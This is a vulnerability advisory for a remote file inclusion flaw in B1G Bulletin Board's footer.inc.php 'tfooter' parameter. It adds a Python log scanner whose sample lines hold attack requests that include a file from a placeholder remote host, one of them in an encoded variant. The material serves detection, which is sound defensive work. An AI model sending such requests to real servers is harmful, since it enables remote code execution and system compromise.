Intrusion Prevention

B1GBB.Footer.Inc.PHP.File.Inclusion

Description

B1G Bulletin Board (b1gBB) has a remote file include vulnerability. A remote attacker could execute arbitrary script code on the web server with the privileges of the server. This can be done via a specially crafted URL request to the 'footer.inc.php' script, using the 'tfooter' parameter to specify a malicious PHP file from a remote system.

Affected Products

B1G Bulletin Board (b1gBB) version 2.24.0 and prior.

Impact

System compromise, remote script execution.

Recommended Actions

Currently we are not aware of any officially supplied fix for this issue.
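
With no official fix available, web server access logs can be reviewed for the request shape given in the Description: a request to 'footer.inc.php' whose 'tfooter' parameter names a remote resource. The following is an added example, not the vendor's signature or code from the original page; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside an access log entry (combined log format is assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme, i.e. not a local template path.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)

def tfooter_values(target):
    """Return decoded 'tfooter' values if the request targets footer.inc.php."""
    parts = urlsplit(target)
    if "/footer.inc.php" not in unquote(parts.path).lower():
        return []
    # parse_qs percent-decodes both names and values, so %74footer is caught.
    return parse_qs(parts.query, keep_blank_values=True).get("tfooter", [])

def scan(lines):
    """Return (line_number, decoded_value) for each suspicious log line.

    Only the request line is inspected; parameters sent in a request body
    do not appear in access logs and are not covered by this check.
    """
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for value in tfooter_values(match.group(1)):
            if REMOTE_RE.match(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2007:10:00:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jul/2007:10:00:07 +0000] "GET /forum/footer.inc.php'
    '?tfooter=http://files.example.invalid/x.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jul/2007:10:00:09 +0000] "GET /forum/footer.inc.php'
    '?tfooter=hTTp%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jul/2007:10:00:12 +0000] "GET /forum/footer.inc.php'
    '?tfooter=templates/footer.html HTTP/1.1" 200 845',
    '192.0.2.77 - - [01/Jul/2007:10:00:15 +0000] "GET /forum/search.php'
    '?tfooter=http://files.example.invalid/x.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: remote tfooter value {value!r}")
```

A hit shows that the request was made, not that the inclusion succeeded; correlate it with the response status and with outbound connections from the web server to the named host.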

CVE References

CVE-2007-3401